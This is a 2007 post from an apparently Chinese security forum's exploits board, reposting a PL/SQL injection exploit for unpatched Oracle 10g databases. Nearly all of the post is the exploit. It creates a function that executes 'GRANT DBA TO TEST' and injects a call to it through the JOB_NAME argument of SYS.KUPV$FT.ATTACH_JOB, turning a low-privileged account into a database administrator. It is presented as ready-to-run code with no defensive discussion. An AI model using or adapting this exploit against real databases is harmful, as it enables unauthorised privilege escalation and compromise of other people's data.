Oracle 10g SYS.KUPV$FT.ATTACH_JOB PL/SQL Injection Exploit

pub!1c

魔

团队执行官

Rank: 8 Rank: 8

E.S.T核心成员

帖子: 3926
精华: 128
积分: 209876
阅读权限: 200
性别: 男
在线时间: 1117 小时
注册时间: 2007-10-23
最后登录: 2008-11-17

资料收集奖运营支持奖

发短消息
加为好友
当前离线

楼主大中小发表于 2007-1-25 22:08 只看该作者

Oracle 10g SYS.KUPV$FT.ATTACH_JOB PL/SQL Injection Exploit

复制内容到剪贴板

代码:

/**

* Exploit for Oracle10g R1 and R2 prior to CPU Oct 2006

* Joxean Koret <[email]joxeankoret@yahoo.es[/email]>

* Privileges needed:

*

* - EXECUTE_CATALOG_ROLE

* - CREATE PROCEDURE

*

*/

select *

from user_role_privs

;



CREATE OR REPLACE FUNCTION F1

RETURN NUMBER AUTHID CURRENT_USER

IS

PRAGMA AUTONOMOUS_TRANSACTION;

BEGIN

EXECUTE IMMEDIATE &#39;GRANT DBA TO TEST&#39;;

COMMIT;

RETURN(1);

END;

/



DECLARE

USER_NAME VARCHAR2(200);

JOB_NAME VARCHAR2(200);

NEW_JOB BOOLEAN;

v_Return NUMBER;

BEGIN

USER_NAME := &#39;OWNER&#39;;

JOB_NAME := &#39;&#39;&#39; OR &#39; || USER || &#39;.f1() = 1--&#39;;



v_Return := SYS.KUPV$FT.ATTACH_JOB(

USER_NAME => USER_NAME,

JOB_NAME => JOB_NAME,

NEW_JOB => NEW_JOB

);

END;

/

TOP

‹‹ 上一主题 | 下一主题 ››

邪恶八进制信息安全团队技术讨论组 » 安全测试代码{ Exploits and Shellcode } » Oracle 10g SYS.KUPV$FT.ATTACH_JOB PL/SQL Injection Exploit